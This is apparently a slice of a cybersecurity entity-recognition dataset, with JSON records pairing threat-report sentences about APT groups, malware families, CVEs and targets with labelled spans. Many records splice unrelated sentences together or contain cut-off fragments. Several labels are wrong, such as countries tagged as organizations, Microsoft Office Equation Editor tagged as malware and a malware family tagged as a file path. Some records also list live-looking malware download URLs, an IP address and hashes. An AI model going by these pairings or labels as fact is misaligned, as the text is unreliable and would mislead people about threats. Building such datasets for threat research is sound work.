{"THREAT_ACTOR: threat group": [[5, 17]], "ORGANIZATION: defense contractors": [[27, 46]], "ORGANIZATION: aerospace companies": [[51, 70]], "FILEPATH: China Chopper": [[73, 86]], "TOOL: Virtual Terminal": [[113, 129]]}, "info": {"id": "cyberner_stix_train_007116", "source": "cyberner_stix_train"}} {"text": "Thanks to this tool reuse , we found the threat group uploading a credential dumping tool called Dumpert that we had not seen used in prior incidents involving the exploitation of CVE-2019-0604 .", "spans": {"TOOL: Dumpert": [[97, 104]], "VULNERABILITY: CVE-2019-0604": [[180, 193]]}, "info": {"id": "cyberner_stix_train_007117", "source": "cyberner_stix_train"}} {"text": "The Word document usually exploits CVE-2012-0158 . 
The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": {"MALWARE: Word document": [[4, 17]], "VULNERABILITY: CVE-2012-0158": [[35, 48]], "TOOL: SMBv1": [[73, 78]], "VULNERABILITY: exploit": [[79, 86]], "THREAT_ACTOR: Shadow Brokers": [[130, 144]]}, "info": {"id": "cyberner_stix_train_007118", "source": "cyberner_stix_train"}} {"text": "According to the document.xml file , the DealersChoice loader SWF exists after the “ covert-shores-small.png ” image file within the delivery document .", "spans": {"FILEPATH: document.xml": [[17, 29]], "TOOL: DealersChoice": [[41, 54]], "TOOL: SWF": [[62, 65]], "FILEPATH: covert-shores-small.png": [[85, 108]]}, "info": {"id": "cyberner_stix_train_007119", "source": "cyberner_stix_train"}} {"text": "RECEIVE_SMS - Allows the application to receive SMS messages . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas .", "spans": {"ORGANIZATION: FireEye": [[73, 80]], "MALWARE: VALUEVAULT": [[152, 162]], "MALWARE: LONGWATCH": [[167, 176]], "THREAT_ACTOR: attackers": [[208, 217]], "THREAT_ACTOR: Gorgon Group": [[265, 277]]}, "info": {"id": "cyberner_stix_train_007120", "source": "cyberner_stix_train"}} {"text": "The first part is the target directory , the second is a regular expression used to match specific files , while the last part is an ID . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 . The last retrieved module is a persistence module . 
Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": {"THREAT_ACTOR: ScarCruft": [[153, 162]], "THREAT_ACTOR: Lesser - known threat actors": [[351, 379]], "MALWARE: DarkSide": [[448, 456]]}, "info": {"id": "cyberner_stix_train_007121", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //mailsa-wqe [ . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government . Using TXT resource records enabled the actors to provide tasking in fewer transactions due to the amount of data that can be transmitted in a TXT . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": {"THREAT_ACTOR: APT28": [[91, 96]], "ORGANIZATION: Bulgaria": [[407, 415]], "ORGANIZATION: China": [[418, 423]], "ORGANIZATION: Vietnam": [[426, 433]]}, "info": {"id": "cyberner_stix_train_007122", "source": "cyberner_stix_train"}} {"text": "TEMP.Veles ’ lateral movement activities used a publicly-available PowerShell based tool , WMImplant .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[0, 10]], "TOOL: PowerShell": [[67, 77]], "TOOL: WMImplant": [[91, 100]]}, "info": {"id": "cyberner_stix_train_007123", "source": "cyberner_stix_train"}} {"text": "Once again this downloader is as straightforward as the Zebrocy gang ’s other downloaders .", "spans": {"MALWARE: Zebrocy": [[56, 63]]}, "info": {"id": "cyberner_stix_train_007124", "source": "cyberner_stix_train"}} {"text": "Users looking forward to using the TikTok app amidst the ban might look for alternative methods to download the app . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . 
The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes , normally using Syrian and Iranian themes .", "spans": {"SYSTEM: TikTok": [[35, 41]], "MALWARE: Xagent": [[118, 124]], "MALWARE: Xagent.exe": [[150, 160]], "MALWARE: worm": [[200, 204]]}, "info": {"id": "cyberner_stix_train_007125", "source": "cyberner_stix_train"}} {"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack .", "spans": {"MALWARE: sample": [[146, 152]], "VULNERABILITY: CVE-2017-11882": [[172, 186], [271, 285]], "VULNERABILITY: CVE-2018-0802": [[190, 203]], "MALWARE: Microsoft Office Equation Editor": [[288, 320]]}, "info": {"id": "cyberner_stix_train_007126", "source": "cyberner_stix_train"}} {"text": "One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit .", "spans": {"TOOL: swissknife2": [[27, 38]], "ORGANIZATION: financial establishments": [[202, 226]]}, "info": {"id": "cyberner_stix_train_007127", "source": "cyberner_stix_train"}} {"text": "As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . 
It is thus interesting to see Buhtrap add strategic web compromises to their arsenal .", "spans": {"TOOL: Bookworm": [[37, 45]], "TOOL: Trojan": [[52, 58]]}, "info": {"id": "cyberner_stix_train_007128", "source": "cyberner_stix_train"}} {"text": "The stages of the FinFisher multi-layered protection mechanisms Stage 0 : Dropper with custom virtual machine The main dropper implements the VM dispatcher loop and can use 32 different opcodes handlers . The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia . Let’s start with who is not targeted . Because the cdhash is computed based on executable code in the application , Mandiant was able to identify additional malware in the environment despite the files being deleted by the threat actor and the samples having different file hashes .", "spans": {"MALWARE: FinFisher": [[18, 27]], "TOOL: Elise malware": [[209, 222]], "THREAT_ACTOR: Lotus Blossom": [[231, 244]], "ORGANIZATION: Mandiant": [[423, 431]]}, "info": {"id": "cyberner_stix_train_007129", "source": "cyberner_stix_train"}} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . 
No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "VULNERABILITY: zero-day": [[180, 188]], "VULNERABILITY: CVE-2011-3544": [[301, 314]], "VULNERABILITY: CVE-2010-0738": [[362, 375]], "ORGANIZATION: Dell SecureWorks'": [[408, 425]]}, "info": {"id": "cyberner_stix_train_007130", "source": "cyberner_stix_train"}} {"text": "Equipped reverse shell payload with specific string After an in-depth look , we found that some versions of the reverse shell payload code share similarities with PRISM – a stealth reverse shell backdoor that is available on Github . OceanLotus's targets include China's maritime institutions , maritime construction , scientific research institutes and shipping enterprises . 
In 2016 and 2017 , the group targeted managed IT service providers , manufacturing and mining companies , and a university .", "spans": {"MALWARE: PRISM": [[163, 168]], "ORGANIZATION: Github": [[225, 231]], "THREAT_ACTOR: OceanLotus's": [[234, 246]], "ORGANIZATION: maritime institutions": [[271, 292]], "ORGANIZATION: maritime construction": [[295, 316]], "ORGANIZATION: scientific research institutes": [[319, 349]], "ORGANIZATION: shipping enterprises": [[354, 374]]}, "info": {"id": "cyberner_stix_train_007131", "source": "cyberner_stix_train"}} {"text": "This threat actor is remarkable for two reasons : Its access to sophisticated zero-day exploits for Microsoft and Adobe software Its use of an advanced piece of government-grade surveillance spyware FinFisher , also known as FinSpy and detected by Microsoft security products as Wingbird FinFisher is such a complex piece of malware that , like other researchers , we had to devise special methods to crack it . APT40 relies heavily on web shells for an initial foothold into an organization . The backdoor reports information about the machine such as the user name , computer name , Windows version and system language to the C&C server and awaits commands . 
• Cisco Talos has discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": {"ORGANIZATION: Microsoft": [[100, 109], [248, 257]], "ORGANIZATION: Adobe": [[114, 119]], "MALWARE: FinFisher": [[199, 208], [288, 297]], "MALWARE: FinSpy": [[225, 231]], "MALWARE: Wingbird": [[279, 287]], "THREAT_ACTOR: APT40": [[412, 417]], "TOOL: web shells": [[436, 446]], "SYSTEM: Windows": [[585, 592]], "ORGANIZATION: Cisco Talos": [[663, 674]], "ORGANIZATION: government entities": [[742, 761]], "ORGANIZATION: military organizations": [[764, 786]], "ORGANIZATION: civilian users": [[791, 805]]}, "info": {"id": "cyberner_stix_train_007132", "source": "cyberner_stix_train"}} {"text": "The Web page shown here on the left is hosted on a domain that seems apt : free-vpn [ . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . In that case, it takes a . The United States is joining with allies and partners to condemn Russia ’s destructive cyber activities against Ukraine .", "spans": {"ORGANIZATION: FireEye": [[88, 95]], "THREAT_ACTOR: APT37": [[142, 147]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[160, 194]], "VULNERABILITY: CVE-2018-4878": [[197, 210]], "TOOL: DOGCALL malware": [[227, 242]], "ORGANIZATION: The United States": [[296, 313]], "THREAT_ACTOR: Russia ’s destructive cyber activities": [[361, 399]], "ORGANIZATION: Ukraine": [[408, 415]]}, "info": {"id": "cyberner_stix_train_007133", "source": "cyberner_stix_train"}} {"text": "In the case of 32-bit systems , the malware may attempt a known UAC bypass by launching printui.exe system process and using token manipulation with NtFilterToken as described in this blog post . 
CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . The way the payload is invoked ( by overwriting the return address on the stack , as opposed to a direct call ) . The Talos Threat Spotlight posts and Quarterly Trends reports provide details of threats and the techniques used by threat actors .", "spans": {"ORGANIZATION: CTU": [[196, 199]], "THREAT_ACTOR: threat actor": [[346, 358]], "THREAT_ACTOR: Mia Ash": [[374, 381]], "ORGANIZATION: Talos": [[502, 507]]}, "info": {"id": "cyberner_stix_train_007134", "source": "cyberner_stix_train"}} {"text": "The majority of infected machines are located in the US , Bangladesh and the UK ;", "spans": {}, "info": {"id": "cyberner_stix_train_007135", "source": "cyberner_stix_train"}} {"text": "First , it modifies the Zygote process . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": {"SYSTEM: Zygote": [[24, 30]], "VULNERABILITY: CVE-2018-8120": [[104, 117]], "TOOL: UACME": [[121, 126]], "ORGANIZATION: telecommunications": [[337, 355]], "ORGANIZATION: defense industries": [[360, 378]]}, "info": {"id": "cyberner_stix_train_007136", "source": "cyberner_stix_train"}} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
There has also been at least one victim targeted by a spear-phishing attack .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]]}, "info": {"id": "cyberner_stix_train_007137", "source": "cyberner_stix_train"}} {"text": "125: UK , US , and Canada 220: UK and Australia 223: Germany 7200: UK 7500: Australia .", "spans": {}, "info": {"id": "cyberner_stix_train_007138", "source": "cyberner_stix_train"}} {"text": "This domain is similar to the one the malware author used for his adware C & C communication , minigameshouse [ . RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . SHA256 : dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d .", "spans": {"MALWARE: RIPPER": [[114, 120]], "FILEPATH: dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d": [[263, 327]]}, "info": {"id": "cyberner_stix_train_007139", "source": "cyberner_stix_train"}} {"text": "Gaza Cybergang Group 3 in Operation Parliament : In this instance , the malware also used people ’s names for C2 communication to send and receive commands from the server .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "TOOL: C2": [[110, 112]]}, "info": {"id": "cyberner_stix_train_007140", "source": "cyberner_stix_train"}} {"text": "The adversaries then issue HTTP GET requests , sometimes with the User-Agent MINIXL , to exfiltrate the archive parts from the victim's network .", "spans": {"TOOL: User-Agent": [[66, 76]], "TOOL: MINIXL": [[77, 83]]}, "info": {"id": "cyberner_stix_train_007141", "source": "cyberner_stix_train"}} {"text": "Further analysis of the malware identified what looks like a custom back door .", "spans": {"TOOL: back door": [[68, 77]]}, "info": {"id": "cyberner_stix_train_007142", "source": "cyberner_stix_train"}} {"text": "Each of these behaviors is under the control of the remote C2 server . 
The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . From this URL it tries to download another stage then storing it into “ C:\\Users\\admin\\AppData\\Roaming\\ ” path with random name . NjRAT is an open - source remote access trojan ( RAT ) whose source code is freely available and is used by commodity actors and APTs , making the process of attribution more difficult .", "spans": {"ORGANIZATION: Kaspersky": [[88, 97]], "VULNERABILITY: zero-day exploit": [[123, 139]], "THREAT_ACTOR: BlackOasis": [[148, 158]], "MALWARE: NjRAT": [[343, 348]], "THREAT_ACTOR: commodity actors": [[451, 467]], "THREAT_ACTOR: APTs": [[472, 476]]}, "info": {"id": "cyberner_stix_train_007143", "source": "cyberner_stix_train"}} {"text": "UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run . The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . The library code performs numerous checks for the CPU features , and based on the outcome , it will choose a processor-specific implementation of the cryptographic function . 
The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP ’s primary capabilities and contains many developer - supplied comments for the included code .", "spans": {"THREAT_ACTOR: attacker": [[157, 165]]}, "info": {"id": "cyberner_stix_train_007144", "source": "cyberner_stix_train"}} {"text": "It is worth noting that shortly before the attack , security vendors reported the use of 0-day exploits in Flash Player and Microsoft Windows by the same threat actor .", "spans": {"VULNERABILITY: 0-day": [[89, 94]], "TOOL: Flash Player": [[107, 119]], "ORGANIZATION: Microsoft": [[124, 133]], "SYSTEM: Windows": [[134, 141]]}, "info": {"id": "cyberner_stix_train_007145", "source": "cyberner_stix_train"}} {"text": "The existence of the Equation Group was first posited in Feb. 2015 by researchers at Russian security firm Kaspersky Lab , which described it as one of the most sophisticated cyber attack teams in the world . 
They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"ORGANIZATION: security firm": [[93, 106]], "ORGANIZATION: Kaspersky Lab": [[107, 120]], "ORGANIZATION: Central Bank 's Automated Workstation Client": [[299, 343]], "ORGANIZATION: ATMs": [[348, 352]]}, "info": {"id": "cyberner_stix_train_007146", "source": "cyberner_stix_train"}} {"text": "% 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html In China alone , we have seen underground market sheep shavers” ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . APT12 : IXESHE , DynCalc , Numbered Panda , DNSCALC .", "spans": {"THREAT_ACTOR: sheep shavers”": [[391, 405]], "THREAT_ACTOR: APT12": [[491, 496]], "THREAT_ACTOR: IXESHE": [[499, 505]], "THREAT_ACTOR: DynCalc": [[508, 515]], "THREAT_ACTOR: Numbered Panda": [[518, 532]], "THREAT_ACTOR: DNSCALC": [[535, 542]]}, "info": {"id": "cyberner_stix_train_007147", "source": "cyberner_stix_train"}} {"text": "If the user wants to check which app is responsible for the ad being displayed , by hitting the “ Recent apps ” button , another trick is used : the app displays a Facebook or Google icon , as seen in Figure 6 . The malware may inject itself into browser processes and explorer.exe . 
We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible .", "spans": {"ORGANIZATION: Facebook": [[164, 172]], "ORGANIZATION: Google": [[176, 182]], "TOOL: malware": [[216, 223]], "MALWARE: explorer.exe": [[269, 281]]}, "info": {"id": "cyberner_stix_train_007148", "source": "cyberner_stix_train"}} {"text": "By : Trend Micro April 20 , 2018 We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35) , a suspected Indian APT group . Paying more attention during the code analysis , we discovered that it is full of junk instructions used to declare and initialize variables never used .", "spans": {"ORGANIZATION: Trend Micro": [[5, 16]], "THREAT_ACTOR: DoNot Team": [[257, 267]]}, "info": {"id": "cyberner_stix_train_007149", "source": "cyberner_stix_train"}} {"text": "Nbtscan — This publicly available command-line tool scans systems for NetBIOS name information ( see Figure 2 ) .", "spans": {"TOOL: Nbtscan": [[0, 7]]}, "info": {"id": "cyberner_stix_train_007150", "source": "cyberner_stix_train"}} {"text": "Spaghetti code makes the program flow hard to read by adding continuous code jumps , hence the name . iDefense analysts have identified a campaign likely to be targeting members of or those with affiliation or interest in the ASEAN Defence Minister 's Meeting ( ADMM ) . 
We have seen it installed as a Windows service and as a DLL in C:\\Windows\\System32 using the following file names : The threat actor was consistently observed removing prior payloads from disk ; however , the FSEvents artifacts were able to provide great insight into files that previously existed on disk .", "spans": {"ORGANIZATION: iDefense": [[102, 110]], "ORGANIZATION: ASEAN Defence Minister 's Meeting": [[226, 259]], "ORGANIZATION: ADMM": [[262, 266]], "SYSTEM: Windows": [[302, 309]], "TOOL: DLL": [[327, 330]], "SYSTEM: FSEvents artifacts": [[480, 498]]}, "info": {"id": "cyberner_stix_train_007151", "source": "cyberner_stix_train"}} {"text": "One certificate was generated locally on what appeared to be a HP-UX box , and another was generated on 8569985.securefastserver.com with an email address root@8569985.securefastserver.com , as seen here for their nethostnet.com domain .", "spans": {"SYSTEM: HP-UX": [[63, 68]], "DOMAIN: 8569985.securefastserver.com": [[104, 132]], "TOOL: email": [[141, 146]], "EMAIL: root@8569985.securefastserver.com": [[155, 188]], "DOMAIN: nethostnet.com": [[214, 228]]}, "info": {"id": "cyberner_stix_train_007152", "source": "cyberner_stix_train"}} {"text": "Artifacts During the research , we found plenty of traces of the developers and those doing the maintaining . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . 
The admin@338 has targeted international media organizations in the past .", "spans": {"MALWARE: Ursnif": [[186, 192]], "MALWARE: Urlzone": [[197, 204]], "THREAT_ACTOR: admin@338": [[227, 236]], "ORGANIZATION: international media organizations": [[250, 283]]}, "info": {"id": "cyberner_stix_train_007153", "source": "cyberner_stix_train"}} {"text": "All MiniDuke components , from the loader and downloader to the backdoor , had been slightly updated and modified during the downtime .", "spans": {"MALWARE: MiniDuke": [[4, 12]]}, "info": {"id": "cyberner_stix_train_007154", "source": "cyberner_stix_train"}} {"text": "' to disguise the Base64 . After injecting Meterpreter into memory , the attacker had complete control of the infected device . The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 .", "spans": {"THREAT_ACTOR: attacker": [[73, 81]]}, "info": {"id": "cyberner_stix_train_007155", "source": "cyberner_stix_train"}} {"text": "Separate administrators into privilege tiers with limited access to other tiers .", "spans": {}, "info": {"id": "cyberner_stix_train_007156", "source": "cyberner_stix_train"}} {"text": "DHS and FBI assess that HIDDEN COBRA actors will continue to use cyber operations to advance their government 's military and strategic objectives .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]], "THREAT_ACTOR: HIDDEN COBRA": [[24, 36]]}, "info": {"id": "cyberner_stix_train_007157", "source": "cyberner_stix_train"}} {"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . 
The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]], "MALWARE: Lambert family malware": [[221, 243]], "ORGANIZATION: FireEye": [[294, 301]], "VULNERABILITY: zero day": [[324, 332]], "VULNERABILITY: exploit": [[333, 340]], "VULNERABILITY: CVE-2014-4148": [[343, 356]]}, "info": {"id": "cyberner_stix_train_007158", "source": "cyberner_stix_train"}} {"text": "In particular , we noted that the Sofacy group deployed a webpage on each of the domains .", "spans": {"THREAT_ACTOR: Sofacy": [[34, 40]]}, "info": {"id": "cyberner_stix_train_007159", "source": "cyberner_stix_train"}} {"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam .", "spans": {"VULNERABILITY: CVE-2019-0752": [[25, 38]], "ORGANIZATION: Trend Micro’s": [[90, 103]], "FILEPATH: Bemstour": [[199, 207]]}, "info": {"id": "cyberner_stix_train_007160", "source": "cyberner_stix_train"}} {"text": "] com Unit 42 published a blog in July 2016 about 9002 malware being delivered using a combination of shortened links and a file hosted on Google Drive . In another instance , APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . 
In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"MALWARE: 9002": [[50, 54]], "THREAT_ACTOR: APT41": [[176, 181]], "THREAT_ACTOR: APT32": [[425, 430]], "ORGANIZATION: governments": [[457, 468]], "ORGANIZATION: dissidents": [[493, 503]], "ORGANIZATION: journalists": [[508, 519]]}, "info": {"id": "cyberner_stix_train_007161", "source": "cyberner_stix_train"}} {"text": "Port 6209 : Telegram extraction service . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . News about Hamas and the Palestinian National Authority . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 ’s domain for hosting his own private blog .", "spans": {"SYSTEM: Telegram": [[12, 20]], "VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[129, 186]], "VULNERABILITY: CVE-2014-6332": [[189, 202]], "ORGANIZATION: Palestinian National Authority": [[287, 317]], "THREAT_ACTOR: Hack520": [[393, 400]]}, "info": {"id": "cyberner_stix_train_007162", "source": "cyberner_stix_train"}} {"text": "This can be packaged and \" sold '' in many different ways to customers . As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . These development efforts may have resulted in the emergence of the WATERSPOUT backdoor . 
The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": {"MALWARE: WATERSPOUT backdoor": [[338, 357]]}, "info": {"id": "cyberner_stix_train_007163", "source": "cyberner_stix_train"}} {"text": "The use of a white font coloring to hide contents within a weaponized document is a technique we had previously reported being used by the Sofacy group in a malicious macro attack .", "spans": {"THREAT_ACTOR: Sofacy": [[139, 145]]}, "info": {"id": "cyberner_stix_train_007164", "source": "cyberner_stix_train"}} {"text": "The xxxx.exe file copies happiness.txt to C:\\PROGRAM FILES\\common files\\ODBC\\ODUBC.DLL and to C:\\WINDOWS\\system32\\jql.sys .", "spans": {"FILEPATH: xxxx.exe": [[4, 12]], "FILEPATH: happiness.txt": [[25, 38]], "FILEPATH: C:\\PROGRAM FILES\\common files\\ODBC\\ODUBC.DLL": [[42, 86]], "FILEPATH: C:\\WINDOWS\\system32\\jql.sys": [[94, 121]]}, "info": {"id": "cyberner_stix_train_007165", "source": "cyberner_stix_train"}} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . 
Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "FILEPATH: Hussarini": [[263, 272]]}, "info": {"id": "cyberner_stix_train_007166", "source": "cyberner_stix_train"}} {"text": "Some malicious files associated with these samples were titled the following : Council_of_ministres_decision Minutes of the Geneva Meeting on Troops Summary of today 's meetings.doc.exe The most important points of meeting the memory of the late President Abu Omar may Allah have mercy on him - Paper No . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan . That string is the base64 encoded version of “ s : 54 ” , meaning “ sleep for 54 minutes ” ( or hours , depending on the particular backdoor ) . 
As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": {"TOOL: ICEFOG": [[411, 417]], "ORGANIZATION: government organizations": [[433, 457]], "ORGANIZATION: defense industry": [[462, 478]], "ORGANIZATION: Nick Biasini": [[654, 666]], "ORGANIZATION: Talos Takes": [[698, 709]]}, "info": {"id": "cyberner_stix_train_007167", "source": "cyberner_stix_train"}} {"text": "At that time , Rockloader was the initial payload downloaded by malicious attached JavaScript files .", "spans": {"MALWARE: Rockloader": [[15, 25]], "TOOL: JavaScript": [[83, 93]]}, "info": {"id": "cyberner_stix_train_007168", "source": "cyberner_stix_train"}} {"text": "The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice .", "spans": {"TOOL: Flash": [[4, 9]], "TOOL: DealersChoice": [[101, 114]]}, "info": {"id": "cyberner_stix_train_007169", "source": "cyberner_stix_train"}} {"text": "Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection .", "spans": {}, "info": {"id": "cyberner_stix_train_007170", "source": "cyberner_stix_train"}} {"text": "Based on samples of Duke malware from 2012 , the Dukes do appear to have continued actively using and developing all of their tools .", "spans": {"THREAT_ACTOR: Duke": [[20, 24]], "THREAT_ACTOR: Dukes": [[49, 54]]}, "info": {"id": "cyberner_stix_train_007171", "source": "cyberner_stix_train"}} {"text": "Additionally , the improvements we made to our protections have been enabled for all users of our security services . RASPITE targeting includes entities in the US , Middle East , Europe , and East Asia . Right after the PE entry point , the standard call to the C Runtime initialization ( __scrt_common_main_seh ) is hooked to launch the malicious payload before everything else . 
More information Over the course of three and a half years , OilRig has used various backdoors , starting with DanBot , as well as using the Shark backdoor in April 2021 before transitioning to the Milan backdoor and the new backdoor Marlin in August 2021 .", "spans": {"THREAT_ACTOR: RASPITE": [[118, 125]], "TOOL: __scrt_common_main_seh": [[290, 312]], "THREAT_ACTOR: OilRig": [[443, 449]], "MALWARE: DanBot": [[493, 499]], "MALWARE: Shark backdoor": [[523, 537]], "MALWARE: Milan backdoor": [[580, 594]], "MALWARE: Marlin": [[616, 622]]}, "info": {"id": "cyberner_stix_train_007172", "source": "cyberner_stix_train"}} {"text": "The spear phishing emails had Myanmar political-themed lures and , if the 9002 C2 server responded , the Trojan sent system specific information along with the string “ jackhex ” . These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns . From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": {"MALWARE: 9002": [[74, 78]], "THREAT_ACTOR: APT41’s": [[252, 259]], "ORGANIZATION: consumer products corporations": [[374, 404]], "THREAT_ACTOR: APT32": [[451, 456]]}, "info": {"id": "cyberner_stix_train_007173", "source": "cyberner_stix_train"}} {"text": "According to the hacking collective , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . 
Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the Trojan .", "spans": {"MALWARE: Potao": [[217, 222]], "MALWARE: Trojan": [[521, 527]]}, "info": {"id": "cyberner_stix_train_007174", "source": "cyberner_stix_train"}} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Blackgear has been targeting various industries since its emergence a decade ago .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]]}, "info": {"id": "cyberner_stix_train_007175", "source": "cyberner_stix_train"}} {"text": "The targets of these campaigns , according to Kaspersky , were located variously in Belgium , Hungary , Luxembourg and Spain .", "spans": {"ORGANIZATION: Kaspersky": [[46, 55]]}, "info": {"id": "cyberner_stix_train_007176", "source": "cyberner_stix_train"}} {"text": "It steals money from the victim ’ s bank account . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target . Winnti : hpqhvsei.dll . 
